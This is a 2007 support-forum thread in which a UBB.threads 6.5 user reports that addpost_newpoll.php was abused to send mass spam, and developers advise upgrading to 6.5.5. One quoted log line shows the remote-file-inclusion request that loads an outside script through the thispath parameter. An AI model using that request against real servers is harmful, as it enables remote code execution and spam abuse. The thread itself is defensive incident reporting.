Site Links
Home
Features
Documentation
Pricing & Order
Members Area
Support Options
UBBDev.com
UBBWiki.com
Who's Online Now
1 registered members (isaac), 69 guests, and 261 spiders.
Key: Admin, Global Mod, Mod
Member Spotlight
Posts: 781
Joined: June 2006
Show All Member Profiles 
Top Posters(30 Days)
Gizmo 17
isaac 15
Ruben 11
Morgan 6
BB 2
Abbott 2
Latest Photos
Previous Thread
Next Thread
Print Thread
extreme security bug used to send ou 100.000s of spam emails #194771
08/21/07 04:34 AM
08/21/07 04:34 AM
Joined: Aug 2007
Posts: 1
W
wnedoe Offline OP
stranger
wnedoe  Offline OP
stranger
W
Joined: Aug 2007
Posts: 1
I use version 6.5

My provider informed me that the UBBT script addpost_newpoll.php
was used to send ou more than 100.000 spam emails and nearly cancelled my contract.

It seems that this is a well known bug at least to spammers as they had even programmed a complete USER INTERFACE for sending spam with UBBt and so probably millions of spam emails are sent out each day with he help of ubbt.

The way this script is/was abused

/forum//addpost_newpoll.php?addpoll=preview&thispath=http://geocities.com/uza_mere/uza.txt? HTTP/1.1" 200

(the abuse script has gone at this place but is probably to be found at a lot of places elsewhere

Re: extreme security bug used to send ou 100.000s of spam emails [Re: wnedoe] #194772
08/21/07 05:19 AM
08/21/07 05:19 AM
Joined: Jun 2006
Posts: 16,935
Portland, OR; USA
Gizmo Offline
UBB.threads Developer
Gizmo  Offline
UBB.threads Developer
Joined: Jun 2006
Posts: 16,935
Portland, OR; USA
Are you running 6.5? If so, security issues are well known in builds prior to 6.5.5, you should consider upgrading.


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Forums: A Gardeners Forum Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: extreme security bug used to send ou 100.000s of spam emails [Re: Gizmo] #194779
08/21/07 10:55 AM
08/21/07 10:55 AM
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
R
Rick Offline
Former Developer
Rick  Offline
Former Developer
R
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
Yes, we sent out an email to all of our customers when we were made aware of this and had a patch out to fix it. You should definitely at least upgrade to 6.5.5 at the minimum.


Shout Box
Today's Birthdays
No Birthdays
Recent Topics
Control Panel / Transactions Username
by Morgan. 06/20/18 05:38 AM
Custom Insert won't save
by Baldeagle. 06/18/18 07:44 PM
New Image capabilities ver 7.6.1
by Abbott. 06/14/18 02:28 PM
Thread deleted?
by Lisanne. 06/05/18 11:13 AM
Forum Statistics
Forums36
Topics35,123
Posts191,338
Members12,088
Most Online978
Jun 24th, 2007
Random Image
Powered by UBB.threads™ PHP Forum Software 7.6.2
(Preview build 20180524)